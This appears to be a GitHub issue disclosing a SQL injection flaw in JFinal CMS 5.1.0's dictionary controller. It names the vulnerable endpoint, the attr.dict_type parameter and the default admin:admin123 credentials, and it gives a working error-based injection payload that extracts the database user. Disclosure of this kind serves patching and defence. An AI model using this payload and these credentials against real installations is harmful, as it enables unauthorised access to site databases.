SQL injection vulnerability exists in JFinal CMS 5.1.0

# Vulnerability Analysis
The vulnerability appears in lines 23-28 of the **com.jflyfox.system.dict.DictController.java**

<img width="951" alt="image-20220610104610536" src="https://user-images.githubusercontent.com/30547070/172980296-78159fe2-2e0d-4e2c-aae3-cf1bd3095253.png">

<img width="1079" alt="image-20220610104555090" src="https://user-images.githubusercontent.com/30547070/172980256-a2433c55-8193-4748-a3e4-2abccb2ba7d9.png">


The **attrVal** parameter is the **attr.dict_type** parameter passed from the front end
So you can construct payload to exploit this vulnerability

# Exploit

Maven Startup Environment
Vulnerability address: /jfinal_cms/system/dict/list
Administrator login is required. The default account password is admin:admin123

<img width="1304" alt="image-20220610103807418" src="https://user-images.githubusercontent.com/30547070/172980313-8d1fdc16-eecf-4b91-bb81-d6d9a34ed095.png">


Injection parameters: **attr.dict_type**

payload：`' OR (SELECT 2896 FROM(SELECT COUNT(*),CONCAT(0x717a7a6271efbd9e,(SELECT (ELT(2896=2896,user()))),0xefbd9e7162707a7131,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)--+`

<img width="1374" alt="image-20220610103651342" src="https://user-images.githubusercontent.com/30547070/172980327-99e6666f-2ca4-4f32-b10b-f86435f0306e.png">


Sqlmap:
<img width="1421" alt="image-20220610103719657" src="https://user-images.githubusercontent.com/30547070/172980438-354b34ac-7b83-469f-bf6c-14382bbd82f1.png">



Provide feedback

Saved searches

Use saved searches to filter your results more quickly

SQL injection vulnerability exists in JFinal CMS 5.1.0 #38

Vulnerability Analysis

Exploit

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development